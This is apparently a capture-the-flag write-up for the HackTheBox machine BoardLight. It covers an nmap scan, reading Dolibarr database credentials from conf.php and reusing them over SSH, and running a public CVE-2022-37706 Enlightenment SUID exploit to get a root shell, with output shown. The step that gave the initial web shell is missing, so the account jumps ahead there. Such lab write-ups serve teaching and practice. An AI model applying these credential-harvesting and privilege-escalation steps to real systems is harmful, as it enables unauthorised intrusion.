This is a writeup of the machine BoardLight from HTB , it’s an easy difficulty Linux machine which featured web enumeration, credential hunting, and exploiting a misconfigured SUID binary.
🔍 Enumeration
An initial nmap scan of the host gave the following results:
1 2 3 4 5 6 7 8 9 10 11 12 13 14
sudo nmap -sV -sC -Pn 10.10.11.11 Starting Nmap 7.80 ( https://nmap.org ) at 2024-09-10 09:08 EDT Nmap scan report for 10.10.11.11 Host is up (0.033s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.64 seconds
There’s only web and SSH, so I started by checking out the site.
🌐 Web
The site isn’t super interesting, there’s a contact form we can play with but it doesn’t seem to do anything meaningful.
On the about page I noticed the WordPress logo, but after doing some digging this doesn’t seem to be a WordPress instance.
I decided to fuzz for directories, the only thing that stood out to me was /server-status
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php cat conf.php <?php // // File generated by Dolibarr installer 17.0.0 on May 13, 2024 // // Take a look at conf.php.example file for an example of conf.php file // and explanations for all possibles parameters. // $dolibarr_main_url_root='http://crm.board.htb'; $dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs'; $dolibarr_main_url_root_alt='/custom'; $dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom'; $dolibarr_main_data_root='/var/www/html/crm.board.htb/documents'; $dolibarr_main_db_host='localhost'; $dolibarr_main_db_port='3306'; $dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_prefix='llx_'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='[REDACTED]'; $dolibarr_main_db_type='mysqli'; $dolibarr_main_db_character_set='utf8'; $dolibarr_main_db_collation='utf8_unicode_ci'; // Authentication settings $dolibarr_main_authentication='dolibarr'; [Removed for Brevity]
This got us the SQL login for dolibarr. Checking on the machine larissa and root are the only users we can login as.
I decided to try the credentials on larissa which worked! I switched to SSH and grabbed the flag.
🥇 Root
Now as larissa, I started by running LinPEAS, it flagged some SUID binaries which stuck out to me.
Enlightenment is apparently a window manager, but Googling Enlightenment SUID helped me find this exploit
This took me a couple tries to get it to work right, but eventually I was able to use this to grab root on the machine.
1 2 3 4 5 6 7 8 9 10 11 12
larissa@boardlight:~$ ./exploit.sh CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can't find in /etc/fstab. # whoami root # cat /root/root.txt [REDACTED]
